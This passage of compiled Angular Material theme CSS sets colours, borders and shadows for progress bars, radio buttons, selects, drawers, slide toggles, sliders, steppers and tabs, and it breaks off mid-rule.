.mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#f44336}.mat-progress-spinner[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .mat-spinner[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#2196f3}.mat-progress-spinner.mat-accent[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .mat-spinner.mat-accent[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#7b1fa2}.mat-progress-spinner.mat-warn[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%], .mat-spinner.mat-warn[_ngcontent-%COMP%]   circle[_ngcontent-%COMP%]{stroke:#f44336}.mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#0000008a}.mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#2196f3}.mat-radio-button.mat-primary[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-primary[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-primary[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#7b1fa2}.mat-radio-button.mat-accent[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-accent[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-accent[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#f44336}.mat-radio-button.mat-warn[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-warn[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-warn[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#f44336}.mat-radio-button.mat-radio-disabled.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%], .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#00000061}.mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%]{background-color:#00000061}.mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-label-content[_ngcontent-%COMP%]{color:#00000061}.mat-radio-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-select-value[_ngcontent-%COMP%]{color:#000000de}.mat-select-placeholder[_ngcontent-%COMP%]{color:#0000006b}.mat-select-disabled[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%]{color:#00000061}.mat-select-arrow[_ngcontent-%COMP%]{color:#0000008a}.mat-select-panel[_ngcontent-%COMP%]{background:white}.mat-select-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-select-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple){background:rgba(0,0,0,.12)}.mat-form-field.mat-focused.mat-primary[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field.mat-focused.mat-accent[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field.mat-focused.mat-warn[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%], .mat-form-field[_ngcontent-%COMP%]   .mat-select.mat-select-invalid[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#f44336}.mat-form-field[_ngcontent-%COMP%]   .mat-select.mat-select-disabled[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#00000061}.mat-drawer-container[_ngcontent-%COMP%]{background-color:#f5f5f5;color:#000000de}.mat-drawer[_ngcontent-%COMP%]{background-color:#fff;color:#000000de}.mat-drawer.mat-drawer-push[_ngcontent-%COMP%]{background-color:#fff}.mat-drawer[_ngcontent-%COMP%]:not(.mat-drawer-side){box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.mat-drawer-side[_ngcontent-%COMP%]{border-right:solid 1px rgba(0,0,0,.12)}.mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%], [dir=rtl][_ngcontent-%COMP%]   .mat-drawer-side[_ngcontent-%COMP%]{border-left:solid 1px rgba(0,0,0,.12);border-right:none}[dir=rtl][_ngcontent-%COMP%]   .mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px rgba(0,0,0,.12)}.mat-drawer-backdrop.mat-drawer-shown[_ngcontent-%COMP%]{background-color:#0009}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#7b1fa28a}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#2196f38a}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#f44336}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#f443368a}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#f44336}.mat-slide-toggle[_ngcontent-%COMP%]:not(.mat-checked)   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-slide-toggle-thumb[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f;background-color:#fafafa}.mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#00000061}.mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#2196f333}.mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#7b1fa233}.mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#f44336}.mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#f4433633}.mat-slider[_ngcontent-%COMP%]:hover   .mat-slider-track-background[_ngcontent-%COMP%], .mat-slider.cdk-focused[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000061}.mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]:hover   .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#0000001f}.mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#000000de}.mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing)   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000042;background-color:transparent}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000061}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover.mat-slider-disabled   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused.mat-slider-disabled   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000042}.mat-slider-has-ticks[_ngcontent-%COMP%]   .mat-slider-wrapper[_ngcontent-%COMP%]:after{border-color:#000000b3}.mat-slider-horizontal[_ngcontent-%COMP%]   .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to right,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent);background-image:-moz-repeating-linear-gradient(.0001deg,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent)}.mat-slider-vertical[_ngcontent-%COMP%]   .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to bottom,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent)}.mat-step-header.cdk-keyboard-focused[_ngcontent-%COMP%], .mat-step-header.cdk-program-focused[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]:hover:not([aria-disabled]), .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=false]{background-color:#0000000a}.mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=true]{cursor:default}@media (hover: none){.mat-step-header[_ngcontent-%COMP%]:hover{background:none}}.mat-step-header[_ngcontent-%COMP%]   .mat-step-label[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]   .mat-step-optional[_ngcontent-%COMP%]{color:#0000008a}.mat-step-header[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{background-color:#0000008a;color:#fff}.mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-error[_ngcontent-%COMP%]{background-color:transparent;color:#f44336}.mat-step-header[_ngcontent-%COMP%]   .mat-step-label.mat-step-label-active[_ngcontent-%COMP%]{color:#000000de}.mat-step-header[_ngcontent-%COMP%]   .mat-step-label.mat-step-label-error[_ngcontent-%COMP%]{color:#f44336}.mat-stepper-horizontal[_ngcontent-%COMP%], .mat-stepper-vertical[_ngcontent-%COMP%]{background-color:#fff}.mat-stepper-vertical-line[_ngcontent-%COMP%]:before{border-left-color:#0000001f}.mat-horizontal-stepper-header[_ngcontent-%COMP%]:before, .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .mat-stepper-horizontal-line[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-horizontal-stepper-header[_ngcontent-%COMP%]{height:72px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%], .mat-vertical-stepper-header[_ngcontent-%COMP%]{padding:24px}.mat-stepper-vertical-line[_ngcontent-%COMP%]:before{top:-16px;bottom:-16px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .mat-stepper-label-position-bottom[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%]:before{top:36px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%]   .mat-stepper-horizontal-line[_ngcontent-%COMP%]{top:36px}.mat-sort-header-arrow[_ngcontent-%COMP%]{color:#757575}.mat-tab-nav-bar[_ngcontent-%COMP%], .mat-tab-header[_ngcontent-%COMP%]{border-bottom:1px solid rgba(0,0,0,.12)}.mat-tab-group-inverted-header[_ngcontent-%COMP%]   .mat-tab-nav-bar[_ngcontent-%COMP%], .mat-tab-group-inverted-header[_ngcontent-%COMP%]   .mat-tab-header[_ngcontent-%COMP%]{border-top:1px solid rgba(0,0,0,.12);border-bottom:none}.mat-tab-label[_ngcontent-%COMP%], .mat-tab-link[_ngcontent-%COMP%]{color:#000000de}.mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#00000061}.mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#000000de}.mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#00000061}.mat-tab-group[class*=mat-background-][_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar[class*=mat-background-][_ngcontent-%COMP%]{border-bottom:none;border-top:none}.mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#2196f3}.mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#f44336}.mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#2196f3}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > 